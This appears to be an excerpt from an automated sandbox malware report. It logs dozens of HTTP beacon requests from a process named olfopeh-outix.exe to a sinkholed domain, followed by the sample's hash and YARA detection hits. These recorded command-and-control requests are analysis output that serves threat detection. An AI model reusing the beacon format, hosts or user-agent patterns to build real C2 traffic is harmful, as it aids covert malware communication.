Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49714	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:05.537735939 CET	118	OUT	GET /d/N?02289E4B28289E4B28199E6728289ED710A1B002B1299E8B802A9A7D061AB0721A18AE6528 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:23:05.566997051 CET	118	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:05 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49715	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:06.202545881 CET	119	OUT	GET /d/N?02289E4B28289E4B28199E6728289ED710A1B002B1299E8B802A9A7D061AB0721A18AE6528 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:23:06.231949091 CET	119	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:06 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49717	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:06.940511942 CET	121	OUT	GET /d/N?02CCB3E1F2CCB3E1F2FDB3CDF2CCB37DCA459DA86BCDB3215ACEB7D7DCFE9DD8C0FC83CFF2 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:23:06.970011950 CET	121	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:06 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49718	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:07.016413927 CET	122	OUT	GET /d/N?02CCB3E1F2CCB3E1F2FDB3CDF2CCB37DCA459DA86BCDB3215ACEB7D7DCFE9DD8C0FC83CFF2 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:23:07.040294886 CET	122	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:07 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.4	49720	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:10.206880093 CET	125	OUT	GET /d/N?02083A3281083A3281393A1E81083AAEB981147B18093AF2290A3E04AF3A140BB3380A1C81 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:23:10.238692045 CET	125	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:10 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.4	49721	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:10.290025949 CET	126	OUT	GET /d/N?02083A3281083A3281393A1E81083AAEB981147B18093AF2290A3E04AF3A140BB3380A1C81 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:23:10.319154978 CET	126	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:10 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.4	49723	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:12.649324894 CET	129	OUT	GET /d/N?02DF53E35ADF53E35AEE53CF5ADF537F62567DAAC3DE5323F2DD57D574ED7DDA68EF63CD5A HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:23:12.677851915 CET	129	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:12 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.4	49724	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:12.712765932 CET	130	OUT	GET /d/N?02DF53E35ADF53E35AEE53CF5ADF537F62567DAAC3DE5323F2DD57D574ED7DDA68EF63CD5A HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:23:12.742181063 CET	130	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:12 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49699	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:22:57.892271996 CET	105	OUT	GET /d/N?0224A77D0D24A77D0D15A7510D24A7E135AD89349425A7BDA526A34B231689443F1497530D HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:22:57.921530962 CET	106	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:22:57 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.4	49726	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:16.188467979 CET	134	OUT	GET /d/N?0259DEF0B359DEF0B368DEDCB359DE6C8BD0F0B92A58DE301B5BDAC69D6BF0C98169EEDEB3 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:23:16.216936111 CET	134	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:16 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.4	49727	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:16.253336906 CET	135	OUT	GET /d/N?0259DEF0B359DEF0B368DEDCB359DE6C8BD0F0B92A58DE301B5BDAC69D6BF0C98169EEDEB3 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:23:16.282865047 CET	135	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:16 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.4	49729	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:20.135998011 CET	139	OUT	GET /d/N?02141BBAD9141BBAD9251B96D9141B26E19D35F340151B7A71161F8CF7263583EB242B94D9 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:23:20.165240049 CET	139	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:20 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.4	49730	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:20.201267958 CET	140	OUT	GET /d/N?02141BBAD9141BBAD9251B96D9141B26E19D35F340151B7A71161F8CF7263583EB242B94D9 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:23:20.231724977 CET	140	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:20 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.4	49732	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:25.435086012 CET	143	OUT	GET /d/N?028E21AF728E21AF72BF2183728E21334A070FE6EB8F216FDA8C25995CBC0F9640BE118172 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:23:25.464356899 CET	143	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:25 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.4	49733	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:25.952943087 CET	144	OUT	GET /d/N?028E21AF728E21AF72BF2183728E21334A070FE6EB8F216FDA8C25995CBC0F9640BE118172 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:23:25.982188940 CET	144	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:25 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.4	49735	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:27.031990051 CET	146	OUT	GET /d/N?0290EC449890EC4498A1EC689890ECD8A019C20D0191EC843092E872B6A2C27DAAA0DC6A98 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:23:27.061037064 CET	146	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:27 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.4	49736	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:27.136780977 CET	147	OUT	GET /d/N?0290EC449890EC4498A1EC689890ECD8A019C20D0191EC843092E872B6A2C27DAAA0DC6A98 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:23:27.166136980 CET	147	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:27 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.4	49738	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:31.670860052 CET	151	OUT	GET /d/N?020CA607B80CA607B83DA62BB80CA69B8085884E210DA6C7100EA231963E883E8A3C9629B8 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:23:31.700038910 CET	151	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:31 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.4	49739	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:31.735656977 CET	152	OUT	GET /d/N?020CA607B80CA607B83DA62BB80CA69B8085884E210DA6C7100EA231963E883E8A3C9629B8 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:23:31.759468079 CET	152	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:31 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49700	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:22:57.957242966 CET	106	OUT	GET /d/N?0224A77D0D24A77D0D15A7510D24A7E135AD89349425A7BDA526A34B231689443F1497530D HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:22:57.985784054 CET	107	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:22:57 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.4	49741	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:34.219074965 CET	154	OUT	GET /d/N?02885B61A6885B61A6B95B4DA6885BFD9E0175283F895BA10E8A5F5788BA755894B86B4FA6 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:23:34.242393017 CET	155	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:34 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.4	49742	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:34.282067060 CET	155	OUT	GET /d/N?02885B61A6885B61A6B95B4DA6885BFD9E0175283F895BA10E8A5F5788BA755894B86B4FA6 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:23:34.311501026 CET	156	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:34 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.4	49744	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:39.672869921 CET	161	OUT	GET /d/N?02380640623806406209066C623806DC5AB12809FB390680CA3A02764C0A28795008366E62 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:23:39.701433897 CET	161	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:39 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.4	49745	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:39.736589909 CET	162	OUT	GET /d/N?02380640623806406209066C623806DC5AB12809FB390680CA3A02764C0A28795008366E62 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:23:39.766236067 CET	162	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:39 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.4	49747	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:41.186084032 CET	163	OUT	GET /d/N?0270CC764670CC764641CC5A4670CCEA7EF9E23FDF71CCB6EE72C8406842E24F7440FC5846 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:23:41.215053082 CET	164	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:41 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.4	49748	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:41.250930071 CET	164	OUT	GET /d/N?0270CC764670CC764641CC5A4670CCEA7EF9E23FDF71CCB6EE72C8406842E24F7440FC5846 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:23:41.280184031 CET	165	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:41 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.4	49750	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:51.823044062 CET	170	OUT	GET /d/N?020A8DA1850A8DA1853B8D8D850A8D3DBD83A3E81C0B8D612D088997AB38A398B73ABD8F85 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:23:51.851922035 CET	170	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:51 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.4	49751	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:51.886902094 CET	171	OUT	GET /d/N?020A8DA1850A8DA1853B8D8D850A8D3DBD83A3E81C0B8D612D088997AB38A398B73ABD8F85 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:23:51.916223049 CET	171	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:51 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.4	49753	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:54.394078970 CET	174	OUT	GET /d/N?02AC7D265AAC7D265A9D7D0A5AAC7DBA6225536FC3AD7DE6F2AE7910749E531F689C4D085A HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:23:54.423795938 CET	174	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:54 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.4	49754	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:54.458770990 CET	175	OUT	GET /d/N?02AC7D265AAC7D265A9D7D0A5AAC7DBA6225536FC3AD7DE6F2AE7910749E531F689C4D085A HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:23:54.488034964 CET	175	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:54 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49702	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:22:58.632793903 CET	108	OUT	GET /d/N?02B6E63A40B6E63A4087E61640B6E6A6783FC873D9B7E6FAE8B4E20C6E84C8037286D61440 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:22:58.664946079 CET	108	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:22:58 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.4	49756	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:24:02.846334934 CET	180	OUT	GET /d/N?022E11CAC92E11CAC91F11E6C92E1156F1A73F83502F110A612C15FCE71C3FF3FB1E21E4C9 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:24:02.875798941 CET	181	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:24:02 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.4	49757	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:24:06.005667925 CET	181	OUT	GET /d/N?022E11CAC92E11CAC91F11E6C92E1156F1A73F83502F110A612C15FCE71C3FF3FB1E21E4C9 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:24:06.035247087 CET	182	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:24:06 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.4	49759	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:24:07.895109892 CET	183	OUT	GET /d/N?022502EAE32502EAE31402C6E3250276DBAC2CA37A24022A4B2706DCCD172CD3D11532C4E3 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:24:07.918298006 CET	183	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:24:07 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.4	49760	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:24:07.948316097 CET	184	OUT	GET /d/N?022502EAE32502EAE31402C6E3250276DBAC2CA37A24022A4B2706DCCD172CD3D11532C4E3 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:24:07.971746922 CET	184	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:24:07 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.4	49762	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:24:10.627754927 CET	188	OUT	GET /d/N?02CDBC4B4FCDBC4B4FFCBC674FCDBCD777449202D6CCBC8BE7CFB87D61FF92727DFD8C654F HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:24:10.656758070 CET	188	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:24:10 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.4	49763	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:24:10.692466021 CET	189	OUT	GET /d/N?02CDBC4B4FCDBC4B4FFCBC674FCDBCD777449202D6CCBC8BE7CFB87D61FF92727DFD8C654F HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:24:10.721329927 CET	189	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:24:10 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49703	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:22:58.697340965 CET	109	OUT	GET /d/N?02B6E63A40B6E63A4087E61640B6E6A6783FC873D9B7E6FAE8B4E20C6E84C8037286D61440 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:22:58.726634026 CET	109	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:22:58 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49705	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:22:59.521182060 CET	111	OUT	GET /d/N?025C9DA2735C9DA2736D9D8E735C9D3E4BD5B3EBEA5D9D62DB5E99945D6EB39B416CAD8C73 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:22:59.544698000 CET	111	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:22:59 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49706	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:22:59.627957106 CET	112	OUT	GET /d/N?025C9DA2735C9DA2736D9D8E735C9D3E4BD5B3EBEA5D9D62DB5E99945D6EB39B416CAD8C73 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:22:59.657037973 CET	112	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:22:59 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49708	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:00.314223051 CET	113	OUT	GET /d/N?020C1E43550C1E43553D1E6F550C1EDF6D85300ACC0D1E83FD0E1A757B3E307A673C2E6D55 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:23:00.337340117 CET	113	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:00 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49709	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:00.379036903 CET	114	OUT	GET /d/N?020C1E43550C1E43553D1E6F550C1EDF6D85300ACC0D1E83FD0E1A757B3E307A673C2E6D55 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:23:00.402533054 CET	114	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:00 GMT Connection: keep-alive X-Sinkhole: Malware

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: KJEfMLiuRS.exePID: 5360, Parent PID: 3528

General

Target ID:	0
Start time:	20:22:06
Start date:	08/12/2022
Path:	C:\Users\user\Desktop\KJEfMLiuRS.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\KJEfMLiuRS.exe
Imagebase:	0x400000
File size:	90812 bytes
MD5 hash:	BFFE00256D8E388757322C0788A1876C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000000.00000000.312972922.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Author: Florian Roth Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Author: Florian Roth
